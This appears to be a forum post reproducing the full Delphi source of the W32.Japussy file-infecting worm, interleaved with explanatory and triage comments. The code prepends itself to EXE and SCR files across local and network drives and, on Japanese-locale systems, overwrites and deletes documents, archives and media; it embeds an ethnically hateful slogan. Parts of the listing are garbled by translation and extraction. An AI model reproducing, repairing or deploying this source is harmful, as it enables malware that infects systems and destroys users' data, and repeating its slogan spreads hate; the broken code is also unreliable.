I have read through it. It is written in Delphi; according to the comments it was built with Delphi 5 SP1. I used Delphi 7 SP1 and had to deal with a few issues. It compiled successfully, but I did not dare to run it, and I don't know who would want to try it. Hey hey...
The code is as follows:
program Japussy;
Uses
Windows, SysUtils, Classes, Graphics, ShellAPI {, Registry };
Const
// Length in bytes of the virus stub placed at the front of every infected file.
// InfectOneFile writes the original host at this offset and ExtractFile skips this many bytes,
// so in an infected file the host program begins at offset HeaderSize.
HeaderSize = 82432; // size of the virus body for this build
IconOffset = $12EB8; // offset of the main icon inside the virus PE file
// Both values come from a Delphi 5 SP1 build; other Delphi versions may give different values.
// Search for the hexadecimal string 2800000020 to find the offset of the main icon.
{
HeaderSize = 38912; // size of the virus body after UPX compression
IconOffset = $ 92BC; // offset of the main icon in the UPX-compressed PE file
// Upx 1.24 W usage: upx-9 -- 8086 Japussy.exe
}
IconSize = $2E8; // size of the main icon of the PE file: 744 bytes
IconTail = IconOffset + IconSize; // offset just past the main icon
// Infection marker. InfectOneFile reads the last 4 bytes of a candidate file and compares
// them with this value, and appends the same value to every file it rewrites, so an
// infected file ends with the bytes 44 44 44 44.
ID = $44444444; // infection mark
// Junk text that SmashFile writes into files before deleting them (declared next).
Catchword = ''If a race need to be killed out, it must be Yamato.'' +
''If a country need to be destroyed, it must be Japan! ''+
''*** W32.Japussy. Worm. ***'';
{$ R *. RES}
// External declaration of RegisterServiceProcess, imported from kernel32.
// The main program calls it only when IsWin9x returns True.
Function RegisterServiceProcess (dwProcessID, dwType: Integer): Integer;
StDCall; external ''kernel32. dll ''; // function declaration
Var
TmpFile: string; // path the host program is extracted to before it is launched (main program)
Si: STARTUPINFO; // filled by FillStartupInfo and passed to CreateProcess
Pi: PROCESS_INFORMATION; // output argument of CreateProcess
IsJap: Boolean = False; // set by InfectFiles when GetACP returns 932; gates the SmashFile branch in LoopFiles
{Reports whether the program is running on Win9x.
 Returns True when GetVersionEx reports VER_PLATFORM_WIN32_WINDOWS and False
 otherwise, including when GetVersionEx itself fails.}
Function IsWin9x: Boolean;
Var
Ver: TOSVersionInfo;
Begin
Result: = False;
// GetVersionEx requires the structure size to be set by the caller.
Ver. dwOSVersionInfoSize: = SizeOf (TOSVersionInfo );
If not GetVersionEx (Ver) then
Exit;
If (Ver. dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then // Win9x
Result: = True;
End;
{Copies Count bytes from Src, starting at sStartPos, into Dst, starting at dStartPos.
 The current positions of both streams are saved first and restored afterwards, so the
 caller's stream positions are left as they were before the call.}
Procedure CopyStream (Src: TStream; sStartPos: Integer; Dst: TStream;
DStartPos: Integer; Count: Integer );
Var
SCurPos, dCurPos: Integer;
Begin
// Remember where each stream currently stands.
SCurPos: = Src. Position;
DCurPos: = Dst. Position;
// Origin 0 = seek from the beginning of the stream.
Src. Seek (sStartPos, 0 );
Dst. Seek (dStartPos, 0 );
Dst. CopyFrom (Src, Count );
// Put both streams back where they were.
Src. Seek (sCurPos, 0 );
Dst. Seek (dCurPos, 0 );
End;
{Writes the host portion of the running (infected) executable to FileName.
 The running file (ParamStr (0)) is opened read-only, the first HeaderSize bytes (the
 virus stub) are skipped, and everything after them is copied to a newly created file.
 Any exception is swallowed by the empty Except block.
 Analysis note: InfectOneFile appends a 4-byte marker after the host, and the copy below
 runs to the end of the file, so the extracted file also carries those 4 trailing bytes.
 Recovering a clean host from an infected sample therefore means taking the data from
 offset HeaderSize onward and dropping the last 4 bytes; HeaderSize is build-specific.}
Procedure ExtractFile (FileName: string );
Var
SStream, dStream: TFileStream;
Begin
Try
SStream: = TFileStream. Create (ParamStr (0), fmOpenRead or fmShareDenyNone );
Try
DStream: = TFileStream. Create (FileName, fmCreate );
Try
SStream. Seek (HeaderSize, 0); // skip the virus stub at the front of the file
DStream. CopyFrom (sStream, sStream. Size-HeaderSize ); // copy the remainder of the file
Finally
DStream. Free;
End;
Finally
SStream. Free;
End;
Except
// errors are ignored silently
End;
End;
{Initialises a STARTUPINFO record for CreateProcess.
 Si    - record to fill (passed by reference).
 State - value stored in wShowWindow; STARTF_USESHOWWINDOW is set so that it is honoured.
 Only the fields assigned below are written by this procedure.}
Procedure FillStartupInfo (var Si: STARTUPINFO; State: Word );
Begin
Si. cb: = SizeOf (Si );
Si. lpReserved: = nil;
Si. lpDesktop: = nil;
Si. lpTitle: = nil;
Si. dwFlags: = STARTF_USESHOWWINDOW;
Si. wShowWindow: = State;
Si. cbReserved2: = 0;
Si. lpReserved2: = nil;
End;
{Placeholder for a mail-sending routine.
 The body is empty in this listing: InfectFiles calls SendMail, but the call does nothing.}
Procedure SendMail;
Begin
// Not implemented in this listing.
End;
{Rewrites one executable so that the virus stub sits in front of it (analysis notes).
 Layout of the rewritten file, as assembled in DstStream below:
   bytes 0 .. HeaderSize-1   copy of the first HeaderSize bytes of the running program,
                             with IconSize bytes at IconOffset taken from the target's icon
   from HeaderSize onward    the original target file, unchanged
   last 4 bytes              the marker $44444444
 A file is left alone when its name compares equal to the literal in the first check,
 when no 'PE' byte pair is found in the scanned header range, when its last 4 bytes
 already equal ID, or when it is smaller than 10240 bytes.
 All exceptions are swallowed by the outer Try/Except.
 Triage note: a file that ends in 44 44 44 44 and holds a second executable image at
 offset HeaderSize matches this layout. HeaderSize depends on the build (see the Const
 section), so that offset should be treated as sample-specific.}
Procedure InfectOneFile (FileName: string );
Var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
IID: LongInt;
AIcon: TIcon;
Infected, IsPE: Boolean;
I: Integer;
Buf: array [0 .. 1] of Char;
Begin
Try // any error (for example the file being in use) ends the procedure silently
If CompareText (FileName, ''japussy. EXE '') = 0 then // skip the virus's own file
Exit;
Infected: = False;
IsPE: = False;
SrcStream: = TFileStream. Create (FileName, fmOpenRead );
Try
// Scan offsets 0..$108 for the two bytes 'P' (#80) and 'E' (#69).
For I: = 0 to $108 do // check the PE file header
Begin
SrcStream. Seek (I, soFromBeginning );
SrcStream. Read (Buf, 2 );
If (Buf [0] = #80) and (Buf [1] = #69) then // PE tag
Begin
IsPE: = True; // treated as a PE file
Break;
End;
End;
// Read the last 4 bytes of the file and compare them with the infection marker.
SrcStream. Seek (-4, soFromEnd); // check the infection mark
SrcStream. Read (iID, 4 );
// Small files are flagged the same way as already-marked files so that they are skipped.
If (iID = ID) or (SrcStream. Size <10240) then // files that are too small are not infected
Infected: = True;
Finally
SrcStream. Free;
End;
If Infected or (not IsPE) then // nothing to do for marked, small or non-PE files
Exit;
IcoStream: = TMemoryStream. Create;
DstStream: = TMemoryStream. Create;
Try
AIcon: = TIcon. Create;
Try
// Extract the first icon of the target file and serialise it into IcoStream.
AIcon. ReleaseHandle;
AIcon. Handle: = ExtractIcon (HInstance, PChar (FileName), 0 );
AIcon. SaveToStream (IcoStream );
Finally
AIcon. Free;
End;
SrcStream: = TFileStream. Create (FileName, fmOpenRead );
// The running program itself is the source of the stub bytes.
HdrStream: = TFileStream. Create (ParamStr (0), fmOpenRead or fmShareDenyNone );
Try
// Stub bytes that precede the icon.
CopyStream (HdrStream, 0, DstStream, 0, IconOffset );
// Icon data of the target file, read from offset 22 of the saved icon stream.
CopyStream (IcoStream, 22, DstStream, IconOffset, IconSize );
// Stub bytes between the end of the icon and the end of the stub.
CopyStream (HdrStream, IconTail, DstStream, IconTail, HeaderSize-IconTail );
// The whole original target file, placed directly after the stub.
CopyStream (SrcStream, 0, DstStream, HeaderSize, SrcStream. Size );
// Append the infection marker at the end (origin 2 = seek from end).
DstStream. Seek (0, 2 );
IID: = $44444444;
DstStream. Write (iID, 4 );
Finally
HdrStream. Free;
End;
Finally
SrcStream. Free;
IcoStream. Free;
// The save runs inside Finally, so the target is overwritten with whatever DstStream holds at this point.
DstStream. SaveToFile (FileName); // replace the target file on disk
DstStream. Free;
End;
Except;
End;
End;
{Overwrites parts of a file with junk text and then deletes it (analysis notes).
 LoopFiles calls this only when IsJap is set and the extension is on its list.
 The attributes are cleared, the file is opened for writing, and Max writes are issued
 at offsets I * (Size div Max), each asking for Length (Catchword) bytes. Max is
 Random (15) raised to a minimum of 5, so between 5 and 14 writes are made. The file is
 then closed and deleted. All exceptions are swallowed.
 Recovery note: the content is overwritten in place before the delete, so an undeleted
 copy would presumably still be damaged at those offsets - confirm against a sample.}
Procedure SmashFile (FileName: string );
Var
FileHandle: Integer;
I, Size, Mass, Max, Len: Integer;
Begin
Try
SetFileAttributes (PChar (FileName), 0); // clear all attributes, including read-only
FileHandle: = FileOpen (FileName, fmOpenWrite); // open the file for writing
Try
Size: = GetFileSize (FileHandle, nil); // file size
I: = 0;
Randomize;
Max: = Random (15); // random number of junk writes
If Max <5 then
Max: = 5;
Mass: = Size div Max; // distance between two consecutive write offsets
Len: = Length (Catchword );
While I <Max do
Begin
FileSeek (FileHandle, I * Mass, 0); // move to the next write offset
// Issue the junk write at this offset.
FileWrite (FileHandle, Catchword, Len );
Inc (I );
End;
Finally
FileClose (FileHandle); // close the file
End;
DeleteFile (PChar (FileName); // delete the file
Except
End;
End;
{Returns the drive letters, out of A..Z, whose type is DRIVE_FIXED or DRIVE_REMOTE.
 Each matching letter is appended to the result string.
 Analysis note: DRIVE_REMOTE is accepted, so mapped network drives are within the
 scope of the directory walk that InfectFiles starts from this list.}
Function GetDrives: string;
Var
DiskType: Word;
D: Char;
Str: string;
I: Integer;
Begin
For I: = 0 to 25 do // one iteration per letter A..Z
Begin
D: = Chr (I + 65 ); // 65 is the character code of 'A'
Str: = D + ':';
DiskType: = GetDriveType (PChar (Str ));
// Keep local fixed disks and network drives only.
If (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result: = Result + D;
End;
End;
{Walks a directory tree and dispatches each file by extension (analysis notes).
 Path - directory to scan; Mask - file mask appended to Path for FindFirst.
 For every entry that IsValidDir classifies as a file:
   - EXE and SCR files are passed to InfectOneFile;
   - the branches for HTML/ASP pages and for address-book files are empty here;
   - every other file is passed to SmashFile, but only when IsJap is set and the
     extension is on the list of document, archive and media types below.
 After the files, the subdirectories are collected and the procedure recurses into them.
 The listing as published was altered by translation and extraction; some expressions
 and string literals in this procedure are incomplete or have stray spaces.
 Monitoring note: the walk pauses 200 ms per entry, so CPU load is a weak signal; one
 process opening many EXE/SCR files for writing across a tree is the behaviour it produces.}
Procedure LoopFiles (Path, Mask: string );
Var
I, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
// Classifies a search result: 0 = file, 1 = subdirectory, 2 = the '.' or '..' entry
// (per the original comments on each branch).
Function IsValidDir (SearchRec: TSearchRec): Integer;
Begin
If (SearchRec. Attr '.') and
(SearchRec. Name <> '..') then
Result: = 0 // not a directory
Else if (SearchRec. Attr = 16) and (SearchRec. Name <> '.') and
(SearchRec. Name <> '..') then
Result: = 1 // a subdirectory (attribute value 16)
Else Result: = 2; // the '.' or '..' entry
End;
Begin
If (FindFirst (Path + Mask, faAnyFile, SearchRec) = 0) then
Begin
Repeat
// Removes one pending message from the queue; the original author's comment says this is done to avoid suspicion.
PeekMessage (Msg, 0, 0, 0, PM_REMOVE);
If IsValidDir (SearchRec) = 0 then
Begin
Fn: = Path + SearchRec. Name;
Ext: = UpperCase (ExtractFileExt (Fn ));
If (Ext = '. EXE') or (Ext = '. SCR') then
Begin
InfectOneFile (Fn); // rewrite the executable with the stub in front
End
Else if (Ext = '. htm') or (Ext ='. HTML ') or (Ext ='. ASP ') then
Begin
// Empty in this listing. The original comments describe an intended step that
// would embed a Base64-encoded copy in HTML and ASP pages; no code is present.
End
Else if Ext = '. wab' then // Outlook address book file
Begin
// Empty in this listing (intended: read Outlook e-mail addresses).
End
Else if Ext = '. ADC' then // Foxmail address auto-completion file
Begin
// Empty in this listing (intended: read Foxmail e-mail addresses).
End
Else if Ext = 'ind 'then // Foxmail address book file
Begin
// Empty in this listing (intended: read Foxmail e-mail addresses).
End
Else
Begin
If IsJap then // only when InfectFiles detected ANSI code page 932
Begin
If (Ext = '. DOC') or (Ext = '. XLS') or (Ext = '. MDB') or
(Ext = '. mp3') or (Ext ='. M') or (Ext = '. A') or
(Ext = '. wm') or (Ext ='. ZIP ') or (Ext ='. RAR ') or
(Ext = '. MPEG') or (Ext = '. asf') or (Ext ='. JPG ') or
(Ext = '. JPEG') or (Ext = '. GIF') or (Ext = '. SWF') or
(Ext = '. PDF') or (Ext = '. chm') or (Ext ='. avi') then
SmashFile (Fn); // overwrite and delete the file
End;
End;
End;
// Pause 200 ms after each entry; the original comment gives keeping CPU usage low as the reason.
Sleep (200 );
Until (FindNext (SearchRec) <> 0 );
End;
FindClose (SearchRec );
// Second pass: collect the names of the subdirectories of Path.
SubDir: = TStringList. Create;
If (FindFirst (Path + '*. *', faDirectory, SearchRec) = 0) then
Begin
Repeat
If IsValidDir (SearchRec) = 1 then
SubDir. Add (SearchRec. Name );
Until (FindNext (SearchRec) <> 0 );
End;
FindClose (SearchRec );
Count: = SubDir. Count-1;
// Recurse once per collected subdirectory.
For I: = 0 to Count do
LoopFiles (Path + SubDir. Strings + '', Mask );
FreeAndNil (SubDir );
End;
{Top-level loop of the program (analysis notes).
 Sets IsJap when the ANSI code page is 932 (Japanese), obtains the drive list from
 GetDrives, then repeats forever: walk the drives with LoopFiles, call SendMail (an
 empty stub in this listing), sleep five minutes. The procedure never returns, so the
 process that enters it stays alive until it is terminated.}
Procedure InfectFiles;
Var
DriverList: string;
I, Len: Integer;
Begin
If GetACP = 932 then // ANSI code page 932 = Japanese
IsJap: = True; // enables the SmashFile branch in LoopFiles
DriverList: = GetDrives; // letters of fixed and network drives
Len: = Length (DriverList );
While True do // runs until the process is terminated
Begin
For I: = Len downto 1 do // one pass per entry in the drive list
LoopFiles (DriverList + ':', '*. *'); // walk the tree with the mask for all files
SendMail; // empty stub in this listing
Sleep (1000*60*5); // wait five minutes before the next pass
End;
End;
{Program entry point (analysis notes).
 1. On Win9x the process is registered through RegisterServiceProcess; the branch for
    other Windows versions is empty in this listing.
 2. If the running file is named Japussy.exe, the program goes straight to InfectFiles.
 3. Otherwise the program is running from an infected host: it derives a second file
    name from its own path (the original comment describes it as the host name with an
    extra space), extracts the host there with ExtractFile, launches it with
    CreateProcess, and then enters InfectFiles in the same process.
 Triage notes: in case 3 the infected file's process keeps running after it has started
 the extracted host as a child, and nothing in this listing removes the extracted file,
 so a near-identically named executable next to the infected one is a likely artefact.}
Begin
If IsWin9x then // Win9x only
RegisterServiceProcess (GetCurrentProcessID, 1) // register the current process as a service process
Else // WinNT
Begin
// Empty in this listing. The original comment mentions a planned remote thread in
// the Explorer process; no code is present.
End;
// Running as the original, stand-alone file?
If CompareText (ExtractFileName (ParamStr (0), 'Japussy.exe ') = 0 then
InfectFiles // enter the main loop directly
Else // running from an infected host file
Begin
TmpFile: = ParamStr (0); // start from the path of the running file
Delete (TmpFile, Length (TmpFile)-4, 4 );
TmpFile: = TmpFile + #32 + '.exe '; // name for the extracted host (#32 is a space)
ExtractFile (TmpFile); // write the host portion of this file to TmpFile
FillStartupInfo (Si, SW_SHOWDEFAULT );
CreateProcess (PChar (TmpFile), PChar (TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); // start the extracted host as a child process
InfectFiles; // then enter the main loop in this process
End;
End.